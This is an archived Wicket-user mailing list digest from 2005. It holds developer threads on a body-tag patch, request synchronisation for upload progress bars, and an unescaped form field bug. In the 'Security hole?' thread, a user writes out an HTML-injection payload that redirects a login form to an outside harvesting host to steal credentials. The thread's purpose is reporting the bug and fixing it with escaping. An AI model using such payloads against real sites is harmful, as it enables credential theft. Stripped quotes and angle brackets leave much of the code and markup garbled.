Re: [Wicket-user] wicket:id on body tag

[Juergen Donnerstag]

Thanks Scott. I'll have a look into it tonight (10 hours from now).

Juergen

On 11/24/05, Scott Sauyet [EMAIL PROTECTED] wrote:
 Juergen Donnerstag wrote:
 I don't know if my use-case is enough of a reason to clutter up the
 interface of WebPage.  I also don't know if there is a reason to widen
 this facility beyond adding AttributeModifiers.  But for what it's
 worth, here is my simple suggestion.
 
 
  Honestly, I'm not in favour of cluttering the interface. What about an
  Interface with one method which if your Page implements it, the method
  is called. That method could be addBodyAttributeModifier. Thus, we do
  not clutter the interface, but it is far less obvious for wicket user
  what to do to achieve it = good javadoc/wiki

 Attached is another patch doing something similar to this suggestion.  I
 added wicket.markup.html.IBodyTagContributor with the method

 public AttributeModifier[] getBodyAttributeModifiers();

 I couldn't really use addBodyAttributeModifier(), as it's
 BodyOnLoadContainer which is going to be calling the interface.

 I'm not sure if it's more Wicketish to return an array like this or a
 List.  (I haven't really used Java 1.5 much, but this is one place where
 I really long for the generic version with ListAttributeModifier.)

 Thanks for the pointer.  This solution feels much more acceptable to me.
   I still don't know if there is any reason to expand on this, but now
 it's easy to simply expand the interface, although I suppose that needs
 to be done before the interface is made public.

   -- Scott


 Index: src/java/wicket/markup/html/BodyOnLoadContainer.java
 ===
 --- src/java/wicket/markup/html/BodyOnLoadContainer.java(revision 103)
 +++ src/java/wicket/markup/html/BodyOnLoadContainer.java(working copy)
 @@ -75,6 +75,13 @@
 {
add(new AttributeModifier(onload, true, new 
 Model(onLoad)));
 }
 +if (this.getPage() instanceof IBodyTagContributor) {
 +IBodyTagContributor bodyContributor = (IBodyTagContributor) 
 this.getPage();
 +AttributeModifier[] modifiers = 
 bodyContributor.getBodyAttributeModifiers();
 +for (int i = 0; i  modifiers.length; i++) {
 +add(modifiers[i]);
 +}
 +}
}

// go on with default implementation
 Index: src/java/wicket/markup/html/IBodyTagContributor.java
 ===
 --- src/java/wicket/markup/html/IBodyTagContributor.java(revision 0)
 +++ src/java/wicket/markup/html/IBodyTagContributor.java(revision 0)
 @@ -0,0 +1,38 @@
 +/*
 + * $Id$
 + * $Revision$
 + *
 + * 
 ==
 + * Licensed under the Apache License, Version 2.0 (the License); you may 
 not
 + * use this file except in compliance with the License. You may obtain a 
 copy of
 + * the License at
 + *
 + * http://www.apache.org/licenses/LICENSE-2.0
 + *
 + * Unless required by applicable law or agreed to in writing, software
 + * distributed under the License is distributed on an AS IS BASIS, WITHOUT
 + * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 + * License for the specific language governing permissions and limitations 
 under
 + * the License.
 + */
 +package wicket.markup.html;
 +
 +import wicket.AttributeModifier;
 +
 +
 +/**
 + * An interface to be implemented by components which are able to add
 + * information to the body tag associated with the markup.
 + *
 + * @author Scott Sauyet
 + */
 +public interface IBodyTagContributor
 +{
 +   /**
 +* Fetch a list of [EMAIL PROTECTED] wicket.AttributeModifier 
 AttributeModifiers} for
 + * the body tag.
 + *
 + * @return all AttributeModifiers which contribute to the lt;BODYgt; 
 tag.
 +*/
 +   public AttributeModifier[] getBodyAttributeModifiers();
 +}





---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37alloc_id865op=click
___
Wicket-user mailing list
Wicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user

Re: [Wicket-user] Upload Progress bar

[Johan Compagner]

yes you are right. There are a things that go outside the session sync for images like the last modified time but handling the resource is also inside the synch block.Maybe it would be nice to not have that, because that looks also for the performance part of a website better. That you can serve out more then one 
image at one time.johanOn 11/24/05, Andrew Lombardi [EMAIL PROTECTED] wrote:
johan,ok, i've attempted that, and ran into the same blocking-type behaviour. I've added the following to the init() of my Application:
   DynamicByteArrayResource dbar = new DynamicByteArrayResource() {  protected byte[] getData() {if(RequestCycle.get()!=null) {ProgressSession sess = (ProgressSession) 
RequestCycle.get().getSession();if(sess!=null) {  int count = sess.getCount();  String countStatus = count: +count;
  return countStatus.getBytes();}}return .getBytes();  }  public String getContentType() {
return text/html;  }};Application.get().getSharedResources().add(statusResource, dbar);
ProgressSession being a Session implementation holding property count.And then in a Page component, I've grabbed a ResourceReference and printed out the accessor url with this:
   ResourceReference ref = new ResourceReference( statusResource);String url = "">System.out.println
(url:+url);And the resource gets pulled up fine without the upload occuring at the same time. but once the upload occurs, it seems to exhibit a blocking behaviour.
any ideas? it shouldn't behave this way right? i'm using 1.1 final.-kinOn Nov 23, 2005, at 3:02 PM, Johan Compagner wrote:
just an idea.The progress bar thread could be a SharedResource request.Those request are not synchonized.And you can give back the progress number everytime the Resource is requested.
johan On 11/23/05, Andrew Lombardi 
[EMAIL PROTECTED] wrote: I've got a need to show an Upload progress bar in a Wicket app that
I've built.We're uploading some fairly large files and would liketo see some statuses.Figured out with Igor how to go aboutinjecting a CountingInputStream into the process for FileUpload, but have run into a roadblock!
What ends up happening, is the page runs a _javascript_, to showanother page that meta refreshes and shows a status grabbed from thesession.And at the same time submits the form to start the upload. Only problem is, it seems to block on the form submissionuploading
the file, and never shows the status page until after its doneprocessing the form.Obviously too late.Igor mentioned that this was probably because Wicket synchronizes with the session.And we both think there must be a way around this
that is missing.the code I have overrides:protected WebRequest newWebRequest(HttpServletRequest servletRequest)and then subclasses ServletWebRequest offering a wrapped MultipartServletWebRequest which passes back a custom FileItem that
wraps the InputStream in a CountingInputStream, that in turn updatesthe Session.Whew!That was long.Ideas and thoughts?Thanks! ---
This SF.Net email is sponsored by the JBoss Inc.Get Certified TodayRegister for a JBoss Training Course.Free Certification Examfor All Training Attendees Through End of 2005. For more info visit: 
http://ads.osdn.com/?ad_id=7628alloc_id=16845op=click___Wicket-user mailing list 
Wicket-user@lists.sourceforge.nethttps://lists.sourceforge.net/lists/listinfo/wicket-user
 

Re: [Wicket-user] Upload Progress bar

[Johan Compagner]

I don't see it as a bug, but more not the best behaviour..The problem is getting rid of that sync block at that levelbecause parseRequest() and response have to be in one synch block because in parseRequest the callComponentListener is called..
if (parseRequest()){ // respond with a page respond();}but in parseRequest() we do the resourceReference() and the staticContent()I think we have remove 
those.things from there so this part:  else if (resourceReference() || staticContent())  {   // if it is, we don't need to update the cluster, etc, and return   // false
  }  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;   } xx
and then in RequestCycle.request() have something like this:boolean parsed = false;synchronize(){parsed = parseRequest()if (parsed)
{
 // respond with a page
 respond();
}}if(!parsed){ callResourceHandlingPartPreviouslyinParseRquest()}then we only have to look if the try/catch/finally block in RequestCycle() must be differentthis:// Attach thread local resources for request
threadAttach();// Response is beginninginternalOnBeginRequest();onBeginRequest();doesn't care if it isn't synched.But this part:
catch (RuntimeException e)   {// Handle any runtime exceptioninternalOnRuntimeException(null, e);   }   finally   {// make sure the invokerPage is ended correctly.
try{ if (invokePage != null) {  invokePage.internalEndRequest(); }}
catch (RuntimeException e){ log.error(Exception occurred during invokerPage.internalEndRequest, e);}should be in the synch block.
the rest (threadDetach() doesn't have to be)johan
On 11/24/05, Igor Vaynberg [EMAIL PROTECTED] wrote:
thats the whole point. the request to retrieve the status would come from another request thread, maybe an iframe with a meta refresh tag or something. why wouldnt this be advisable? http is a multithreaded protocol, as long as the operation of retrieving a resource does not touch any objects in an unthreadsafe manner it should be fine. like retrieving a package resource, why should threads like that block? for pages we need to synchronize on the session because we save the users a lot of headaches by allowing them not to worry about thread safety.
resources are a different matter. imagine a page with a component that renders twenty package resources that are images. we dont want the browser to only be able to retrieve them one by one, its a performance bottleneck which will lead to much longer page loading times. and no, resource caching is not a solution that will fix performance.
however, seems like that is exactly what is happening currently. wicketservlet.doget() calls requestcycle.request() and the first thing that does is synchronize on the session before it knows if the request is for a resource or for a page. to me this looks like a major bug. what do others think?
-IgorOn 11/23/05, Nick Heudecker 
[EMAIL PROTECTED] wrote:
I don't see how the upload wouldn't block the request thread. You'd need to have another thread running to return the status to the user, and I'm not sure that possible, or even advisable. 

On 11/24/05, Andrew Lombardi [EMAIL PROTECTED] wrote:


johan,ok, i've attempted that, and ran into the same blocking-type behaviour. I've added the following to the init() of my Application:   DynamicByteArrayResource dbar = new DynamicByteArrayResource() {
  protected byte[] getData() {if(RequestCycle.get()!=null) {ProgressSession sess = (ProgressSession) RequestCycle.get().getSession();if(sess!=null) {
  int count = sess.getCount();  String countStatus = count: +count;  return countStatus.getBytes();}
}return .getBytes();  }  public String getContentType() {return text/html;
  }};Application.get().getSharedResources().add(statusResource, dbar);ProgressSession being a Session implementation holding property count.
And then in a Page component, I've grabbed a ResourceReference and printed out the accessor url with this:   ResourceReference ref = new ResourceReference( statusResource);
String url = "">System.out.println(url:+url);And the resource gets pulled up fine without the upload occuring at the same time. but once the upload occurs, it seems to exhibit a blocking behaviour.
any ideas? it shouldn't behave this way right? i'm using 1.1 final.-kinOn Nov 23, 2005, at 3:02 PM, Johan Compagner wrote:
just an idea.The progress bar thread could be a SharedResource request.Those request are not synchonized.And you can give back the progress number everytime the Resource is requested.
johan On 11/23/05, Andrew Lombardi 


[EMAIL PROTECTED] wrote: I've got a need to show an Upload progress bar in a Wicket app that
I've built.We're uploading some fairly large files and would liketo see some statuses.Figured out with Igor how to go aboutinjecting a CountingInputStream into the 

Re: [Wicket-user] How do I register customed Converter into Application ?

[Johan Compagner]

see Application: public IConverterFactory getConverterFactory() {  return converterFactory; }On 11/24/05, Ingram Chen
 [EMAIL PROTECTED] wrote:Dear all, 
 I wrote several converters which extends AbstractConverter, but no ideas abouthow to set them as 'default' converter. any idea ?-- Ingram ChenJava [EMAIL PROTECTED]

Institue of BioMedical Sciences Academia Sinica Taiwanblog: http://www.javaworld.com.tw/roller/page/ingramchen

Re: [Wicket-user] Upload Progress bar

[Igor Vaynberg]

boolean parsed = false;synchronize()should be boolean parsed = false;
synchronized(session)right?then we are back to the same problem. it will wait for session to be come available until it can parse the request.we need to somehow check if the url being requested is a resource before we sync on session
something like this in pseudoboolean requestForResource=isRequsetForResource(url);if (requestForResource) {handle resource} else {synchronize(session) { parse(); respond(); }}this can also open a can of worms for dynamic resources that use the session because that access will need to be made threadsafe by the user.
-Igor
On 11/24/05, Johan Compagner [EMAIL PROTECTED] wrote:
I don't see it as a bug, but more not the best behaviour..The problem is getting rid of that sync block at that levelbecause parseRequest() and response have to be in one synch block because in parseRequest the callComponentListener is called..
if (parseRequest()){ // respond with a page respond();}but in parseRequest() we do the resourceReference() and the staticContent()I think we have remove 
those.things from there so this part:  else if (resourceReference() || staticContent())  {   // if it is, we don't need to update the cluster, etc, and return   // false

  }  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;   } xx
and then in RequestCycle.request() have something like this:boolean parsed = false;synchronize(){parsed = parseRequest()if (parsed)
{
 // respond with a page
 respond();
}}if(!parsed){ callResourceHandlingPartPreviouslyinParseRquest()}then we only have to look if the try/catch/finally block in RequestCycle() must be differentthis:// Attach thread local resources for request
threadAttach();// Response is beginninginternalOnBeginRequest();onBeginRequest();doesn't care if it isn't synched.But this part:
catch (RuntimeException e)   {// Handle any runtime exceptioninternalOnRuntimeException(null, e);   }   finally   {// make sure the invokerPage is ended correctly.
try{ if (invokePage != null) {  invokePage.internalEndRequest(); }}
catch (RuntimeException e){ log.error(Exception occurred during invokerPage.internalEndRequest, e);}should be in the synch block.
the rest (threadDetach() doesn't have to be)johan
On 11/24/05, Igor Vaynberg 
[EMAIL PROTECTED] wrote:
thats the whole point. the request to retrieve the status would come from another request thread, maybe an iframe with a meta refresh tag or something. why wouldnt this be advisable? http is a multithreaded protocol, as long as the operation of retrieving a resource does not touch any objects in an unthreadsafe manner it should be fine. like retrieving a package resource, why should threads like that block? for pages we need to synchronize on the session because we save the users a lot of headaches by allowing them not to worry about thread safety.
resources are a different matter. imagine a page with a component that renders twenty package resources that are images. we dont want the browser to only be able to retrieve them one by one, its a performance bottleneck which will lead to much longer page loading times. and no, resource caching is not a solution that will fix performance.
however, seems like that is exactly what is happening currently. wicketservlet.doget() calls requestcycle.request() and the first thing that does is synchronize on the session before it knows if the request is for a resource or for a page. to me this looks like a major bug. what do others think?
-IgorOn 11/23/05, Nick Heudecker 

[EMAIL PROTECTED] wrote:
I don't see how the upload wouldn't block the request thread. You'd need to have another thread running to return the status to the user, and I'm not sure that possible, or even advisable. 

On 11/24/05, Andrew Lombardi [EMAIL PROTECTED] wrote:



johan,ok, i've attempted that, and ran into the same blocking-type behaviour. I've added the following to the init() of my Application:   DynamicByteArrayResource dbar = new DynamicByteArrayResource() {
  protected byte[] getData() {if(RequestCycle.get()!=null) {ProgressSession sess = (ProgressSession) RequestCycle.get().getSession();if(sess!=null) {
  int count = sess.getCount();  String countStatus = count: +count;  return countStatus.getBytes();}
}return .getBytes();  }  public String getContentType() {return text/html;
  }};Application.get().getSharedResources().add(statusResource, dbar);ProgressSession being a Session implementation holding property count.
And then in a Page component, I've grabbed a ResourceReference and printed out the accessor url with this:   ResourceReference ref = new ResourceReference( statusResource);
String url = "">System.out.println(url:+url);And the resource gets pulled up fine without the upload occuring at 

Re: [Wicket-user] Upload Progress bar

[Johan Compagner]

you are right. My quick prototyping was not completely valid.we should just invert it yes first check for isResource() || isStatic()and if that returns false then do something elseThe problem is that in the end we do this:
  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;
   } xx
where do we do that now? I haven't used it yet but that is i think user parsed request.Where does that belong?johanOn 11/24/05, 
Igor Vaynberg [EMAIL PROTECTED] wrote:
boolean parsed = false;synchronize()should be boolean parsed = false;
synchronized(session)right?then we are back to the same problem. it will wait for session to be come available until it can parse the request.we need to somehow check if the url being requested is a resource before we sync on session
something like this in pseudoboolean requestForResource=isRequsetForResource(url);if (requestForResource) {handle resource} else {synchronize(session) { parse(); respond(); }}this can also open a can of worms for dynamic resources that use the session because that access will need to be made threadsafe by the user.
-Igor
On 11/24/05, Johan Compagner [EMAIL PROTECTED]
 wrote:
I don't see it as a bug, but more not the best behaviour..The problem is getting rid of that sync block at that levelbecause parseRequest() and response have to be in one synch block because in parseRequest the callComponentListener is called..
if (parseRequest()){ // respond with a page respond();}but in parseRequest() we do the resourceReference() and the staticContent()I think we have remove 
those.things from there so this part:  else if (resourceReference() || staticContent())  {   // if it is, we don't need to update the cluster, etc, and return   // false


  }  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;   } xx
and then in RequestCycle.request() have something like this:boolean parsed = false;synchronize(){parsed = parseRequest()if (parsed)
{
 // respond with a page
 respond();
}}if(!parsed){ callResourceHandlingPartPreviouslyinParseRquest()}then we only have to look if the try/catch/finally block in RequestCycle() must be differentthis:// Attach thread local resources for request
threadAttach();// Response is beginninginternalOnBeginRequest();onBeginRequest();doesn't care if it isn't synched.But this part:
catch (RuntimeException e)   {// Handle any runtime exceptioninternalOnRuntimeException(null, e);   }   finally   {// make sure the invokerPage is ended correctly.
try{ if (invokePage != null) {  invokePage.internalEndRequest(); }}
catch (RuntimeException e){ log.error(Exception occurred during invokerPage.internalEndRequest, e);}should be in the synch block.
the rest (threadDetach() doesn't have to be)johan
On 11/24/05, Igor Vaynberg 

[EMAIL PROTECTED] wrote:
thats the whole point. the request to retrieve the status would come from another request thread, maybe an iframe with a meta refresh tag or something. why wouldnt this be advisable? http is a multithreaded protocol, as long as the operation of retrieving a resource does not touch any objects in an unthreadsafe manner it should be fine. like retrieving a package resource, why should threads like that block? for pages we need to synchronize on the session because we save the users a lot of headaches by allowing them not to worry about thread safety.
resources are a different matter. imagine a page with a component that renders twenty package resources that are images. we dont want the browser to only be able to retrieve them one by one, its a performance bottleneck which will lead to much longer page loading times. and no, resource caching is not a solution that will fix performance.
however, seems like that is exactly what is happening currently. wicketservlet.doget() calls requestcycle.request() and the first thing that does is synchronize on the session before it knows if the request is for a resource or for a page. to me this looks like a major bug. what do others think?
-IgorOn 11/23/05, Nick Heudecker 


[EMAIL PROTECTED] wrote:
I don't see how the upload wouldn't block the request thread. You'd need to have another thread running to return the status to the user, and I'm not sure that possible, or even advisable. 

On 11/24/05, Andrew Lombardi [EMAIL PROTECTED] wrote:




johan,ok, i've attempted that, and ran into the same blocking-type behaviour. I've added the following to the init() of my Application:   DynamicByteArrayResource dbar = new DynamicByteArrayResource() {
  protected byte[] getData() {if(RequestCycle.get()!=null) {ProgressSession sess = (ProgressSession) RequestCycle.get().getSession();if(sess!=null) {
  int count = sess.getCount();  String countStatus = count: +count;  return countStatus.getBytes();}
}return .getBytes();  }   

Re: [Wicket-user] Upload Progress bar

[Igor Vaynberg]

i havent used that either so im not sure. but that probably needs to be inside the synchronized block. its in the else block so its safe to check for resource before that check runs.
im off to bed now, 1am here :)-IgorOn 11/24/05, Johan Compagner [EMAIL PROTECTED] wrote:
you are right. My quick prototyping was not completely valid.we should just invert it yes first check for isResource() || isStatic()
and if that returns false then do something elseThe problem is that in the end we do this:
  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;
   } xx
where do we do that now? I haven't used it yet but that is i think user parsed request.Where does that belong?
johanOn 11/24/05, 
Igor Vaynberg [EMAIL PROTECTED] wrote:

boolean parsed = false;synchronize()should be boolean parsed = false;
synchronized(session)right?then we are back to the same problem. it will wait for session to be come available until it can parse the request.we need to somehow check if the url being requested is a resource before we sync on session
something like this in pseudoboolean requestForResource=isRequsetForResource(url);if (requestForResource) {handle resource} else {synchronize(session) { parse(); respond(); }}this can also open a can of worms for dynamic resources that use the session because that access will need to be made threadsafe by the user.
-Igor
On 11/24/05, Johan Compagner [EMAIL PROTECTED]
 wrote:
I don't see it as a bug, but more not the best behaviour..The problem is getting rid of that sync block at that levelbecause parseRequest() and response have to be in one synch block because in parseRequest the callComponentListener is called..
if (parseRequest()){ // respond with a page respond();}but in parseRequest() we do the resourceReference() and the staticContent()I think we have remove 
those.things from there so this part:  else if (resourceReference() || staticContent())  {   // if it is, we don't need to update the cluster, etc, and return   // false



  }  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;   } xx
and then in RequestCycle.request() have something like this:boolean parsed = false;synchronize(){parsed = parseRequest()if (parsed)
{
 // respond with a page
 respond();
}}if(!parsed){ callResourceHandlingPartPreviouslyinParseRquest()}then we only have to look if the try/catch/finally block in RequestCycle() must be differentthis:// Attach thread local resources for request
threadAttach();// Response is beginninginternalOnBeginRequest();onBeginRequest();doesn't care if it isn't synched.But this part:
catch (RuntimeException e)   {// Handle any runtime exceptioninternalOnRuntimeException(null, e);   }   finally   {// make sure the invokerPage is ended correctly.
try{ if (invokePage != null) {  invokePage.internalEndRequest(); }}
catch (RuntimeException e){ log.error(Exception occurred during invokerPage.internalEndRequest, e);}should be in the synch block.
the rest (threadDetach() doesn't have to be)johan
On 11/24/05, Igor Vaynberg 


[EMAIL PROTECTED] wrote:
thats the whole point. the request to retrieve the status would come from another request thread, maybe an iframe with a meta refresh tag or something. why wouldnt this be advisable? http is a multithreaded protocol, as long as the operation of retrieving a resource does not touch any objects in an unthreadsafe manner it should be fine. like retrieving a package resource, why should threads like that block? for pages we need to synchronize on the session because we save the users a lot of headaches by allowing them not to worry about thread safety.
resources are a different matter. imagine a page with a component that renders twenty package resources that are images. we dont want the browser to only be able to retrieve them one by one, its a performance bottleneck which will lead to much longer page loading times. and no, resource caching is not a solution that will fix performance.
however, seems like that is exactly what is happening currently. wicketservlet.doget() calls requestcycle.request() and the first thing that does is synchronize on the session before it knows if the request is for a resource or for a page. to me this looks like a major bug. what do others think?
-IgorOn 11/23/05, Nick Heudecker 



[EMAIL PROTECTED] wrote:
I don't see how the upload wouldn't block the request thread. You'd need to have another thread running to return the status to the user, and I'm not sure that possible, or even advisable. 

On 11/24/05, Andrew Lombardi [EMAIL PROTECTED] wrote:





johan,ok, i've attempted that, and ran into the same blocking-type behaviour. I've added the following to the init() of my Application:   DynamicByteArrayResource dbar = new DynamicByteArrayResource() {
  protected byte[] getData() {if(RequestCycle.get()!=null) {  

Re: [Wicket-user] Upload Progress bar

[Johan Compagner]

ok changed the code over here, this is RequestCycle.request:public final void request() throws ServletException {  // Serialize renderings on the session object so that only one page  // can be rendered at a time for a given session.
  try  {   // Attach thread local resources for request   threadAttach();   // Response is beginning   internalOnBeginRequest();   onBeginRequest();
   // If request is parsed successfully   if(!parseResource())   {synchronized (session){ try {
  if (parseRequest())  {   // respond with a page   respond();  } }
 catch (RuntimeException e) {  // Handle any runtime exception  internalOnRuntimeException(null, e); }
 finally {  // make sure the invokerPage is ended correctly.  try  {   if (invokePage != null)
   {invokePage.internalEndRequest();   }  }  catch (RuntimeException e)
  {   log.error(Exception occurred during invokerPage.internalEndRequest, e);  } }}   }
  }  catch (RuntimeException e)  {   // Handle any runtime exception   internalOnRuntimeException(null, e);  }  finally  {   // Response is ending
   try   {internalOnEndRequest();   }   catch (RuntimeException e)   {log.error(Exception occurred during internalOnEndRequest, e);
   }   try   {onEndRequest();   }   catch (RuntimeException e)   {log.error(Exception occurred during onEndRequest, e);
   }   // Release thread local resources   threadDetach();  } }And then one extra method in WebRequestCycle:protected final boolean parseResource()
 {  // If it's not a resource reference or static content  if (resourceReference() || staticContent())  {   // Don't update the cluster, not returning a page   setUpdateCluster(false);
   setResponsePage((Page)null);   return true;  }  return false; }that is the behaviour that was in parseRequest() for resources and static content.Now the only question is is it save for these 2 methods to be not synced:
   // Response is beginning
   internalOnBeginRequest();
   onBeginRequest();
What can a user do there in onBeginRequest() (i think openen sessions for hibernate and those things but that is not problem because those are for the current thread)we do ourselfs Session.updateSession() where we loop and order pages(sets) and set those in the session if they wheren't already and so on.
I think that we don't have to do that when it is a Resource lookup but i am not sure.I am also not sure if Session.updateSession() can run twice at the same time or at the same time if a page map would be updated by another thread that is in 
callComponentListener area... A bit tricky..johanOn 11/24/05, Igor Vaynberg [EMAIL PROTECTED]
 wrote:i havent used that either so im not sure. but that probably needs to be inside the synchronized block. its in the else block so its safe to check for resource before that check runs.

im off to bed now, 1am here :)-IgorOn 11/24/05, Johan Compagner 
[EMAIL PROTECTED] wrote:
you are right. My quick prototyping was not completely valid.we should just invert it yes first check for isResource() || isStatic()
and if that returns false then do something elseThe problem is that in the end we do this:
  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;
   } xx
where do we do that now? I haven't used it yet but that is i think user parsed request.Where does that belong?

johanOn 11/24/05, 
Igor Vaynberg [EMAIL PROTECTED] wrote:


boolean parsed = false;synchronize()should be boolean parsed = false;
synchronized(session)right?then we are back to the same problem. it will wait for session to be come available until it can parse the request.we need to somehow check if the url being requested is a resource before we sync on session
something like this in pseudoboolean requestForResource=isRequsetForResource(url);if (requestForResource) {handle resource} else {synchronize(session) { parse(); respond(); }}this can also open a can of worms for dynamic resources that use the session because that access will need to be made threadsafe by the user.
-Igor
On 11/24/05, Johan Compagner [EMAIL PROTECTED]
 wrote:
I don't see it as a bug, but more not the best behaviour..The problem is getting rid of that sync block at that levelbecause parseRequest() and response have to be in one synch block because in parseRequest the callComponentListener is called..
if (parseRequest()){ // respond with a page respond();}but in parseRequest() we do the resourceReference() and the staticContent()I think we have remove 
those.things from there so this part:  else if (resourceReference() || staticContent())  {   // if it is, we don't need to update the cluster, etc, and return   // false




  }  else  {   int rtn = doParseRequest();   if (rtn == PARSE_REQUEST_RETURNING_PAGE)   {return true;   } xx
and then in RequestCycle.request() have something like this:boolean parsed = 

Re: [Wicket-user] anyone built a large app with wicket?

[Francis Amanfo]

Hi,

I'm probably late with this one- just returned from vacation :-)
Check this out: http://www.ibfd.org/portal/app?bookmarkablePage=home

FrancisOn 11/18/05, Sam Gendler [EMAIL PROTECTED] wrote:
Can someone out there who has used wicket to build a fairly fullfeatured application provide a URL for me to check it out?I am goingto be building an app that will need _javascript_ drop down menus(created programmatically), forms with optional fields depending upon
authentication role, _javascript_ based tooltips (or at least aclickable help icon next to form fields), and wizard-like multi-pageforms.I'd love to see examples of all or most of those thingsimplemented in wicket, in order to ensure that such things are
possible within wicket as it currently stands.I am particularlyconcerned about being able to prgrammatically include componentsconditionally, since both my menus and my forms will vary dependingupon a User's role.
Thanks.---This SF.Net email is sponsored by the JBoss Inc.Get Certified TodayRegister for a JBoss Training Course.Free Certification Exam
for All Training Attendees Through End of 2005. For more info visit:http://ads.osdn.com/?ad_idv28alloc_id845opclick___
Wicket-user mailing listWicket-user@lists.sourceforge.nethttps://lists.sourceforge.net/lists/listinfo/wicket-user

[Wicket-user] Security hole?

[Johannes Fahrenkrug]

Hi,

I have built several forms using Wicket. Just out of curiosity I tried 
to enter the following line into a text field:


scriptalert('Soylent Green Is People');/script test=

When I reload the form, the JavaScript code gets executed. Shouldn't 
such special characters be converted to HTML entities when the page gets 
parsed? (You know lt; instead of  and so forth)


Cheers,

Johannes.


---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
___
Wicket-user mailing list
Wicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user

Re: [Wicket-user] Security hole?

[Johan Compagner]

so when i have this:x = 6  7  10  5as text in my model it gets encoded into html? (And thats what i see?)That is something i don't want The problem you describe is i think the  at the beginning that makes it all possible,
(else it was just a text value of the value attribute)johanOn 11/24/05, Johannes Fahrenkrug [EMAIL PROTECTED]
 wrote:Hi,I have built several forms using Wicket. Just out of curiosity I tried
to enter the following line into a text field:scriptalert('Soylent Green Is People');/script test=When I reload the form, the _javascript_ code gets executed. Shouldn'tsuch special characters be converted to HTML entities when the page gets
parsed? (You know lt; instead of  and so forth)Cheers,Johannes.---This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?Stop!Download the new AJAX search engine that makessearching your log files as easy as surfing theweb.DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click___Wicket-user mailing listWicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user

Re: [Wicket-user] Security hole?

[Johannes Fahrenkrug]

Johan Compagner wrote:


so when i have this:

x = 6  7  10  5

as text in my model it gets encoded into html? (And thats what i see?)
That is something i don't want


No, I think this would be the right thing to do:
the value of the model is x = 6  7  10  5
but as soon as wicket renders the page and the value of the input field 
that the model is attached to,

it should render the value as x = 6 lt; 7 amp; 10 gt; 5
so that the html source will read

input type=text value=x = 6 lt; 7 amp; 10 gt; 5
instead of
input type=text value=x = 6  7  10  5

special chars should only be RENDERED as html entities, not saved as 
html entities in the model.




The problem you describe is i think the  at the beginning that makes 
it all possible,



(else it was just a text value of the value attribute)


the  makes it possible to break out of the value parameter of the input 
field. That could pose a security risk, though.
Imagine this: You have a login form that saves the username in case the 
login failed and the page is reloaded.

Some malicious person opens the login page and enters this:

 
onChange=document.form[0].action='http://loginAndPasswordHarvester.com' 
dummy=


He sends off the form, it gets reloaded because the login is invalid 
and he leaves the terminal for someone else to login.
When someone else trys to log in, their username and password get sent 
to a different server.


So I guess rendering special characters as html entities might be a good 
idea.


Cheers,

Johannes.






johan


On 11/24/05, *Johannes Fahrenkrug* [EMAIL PROTECTED] 
mailto:[EMAIL PROTECTED] wrote:


Hi,

I have built several forms using Wicket. Just out of curiosity I
tried
to enter the following line into a text field:

scriptalert('Soylent Green Is People');/script test=

When I reload the form, the JavaScript code gets executed. Shouldn't
such special characters be converted to HTML entities when the
page gets
parsed? (You know lt; instead of  and so forth)

Cheers,

Johannes.


---
This SF.net email is sponsored by: Splunk Inc. Do you grep through
log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD
SPLUNK!
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
___
Wicket-user mailing list
Wicket-user@lists.sourceforge.net
mailto:Wicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user






---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637alloc_id=16865op=click
___
Wicket-user mailing list
Wicket-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wicket-user

Re: [Wicket-user] Security hole?

[Laurent PETIT]

This problem is not only a security problem, but also a bug :

Indeed, please go to the Wicket Examples, and try this: (http://www.wicket-library.com/wicket-examples/index.html
)
-enter this in the first textfield of the forminput example : My team's name is Wicket's team
- Then erase the value of the Integer textfield (in order to generate an invalid input).
- Submit the form

You can see that the form will not be correctly re-displayed ( check the content of the String textfield)

The problem may be solved by replacing the FormComponent.getValue() method return statement : 

return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : invalidInput;
by this one: 

return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : Strings.escapeMarkup(invalidInput);

( Please note that Component.getModelObjectAsString() (html) escapes the value of the model)

HTH,

-- 
Laurent
On 11/24/05, Johannes Fahrenkrug [EMAIL PROTECTED] wrote:
Johan Compagner wrote: so when i have this: x = 6  7  10  5
 as text in my model it gets encoded into html? (And thats what i see?) That is something i don't wantNo, I think this would be the right thing to do:the value of the model is x = 6  7  10  5
but as soon as wicket renders the page and the value of the input fieldthat the model is attached to,it should render the value as x = 6 lt; 7 amp; 10 gt; 5so that the html source will read
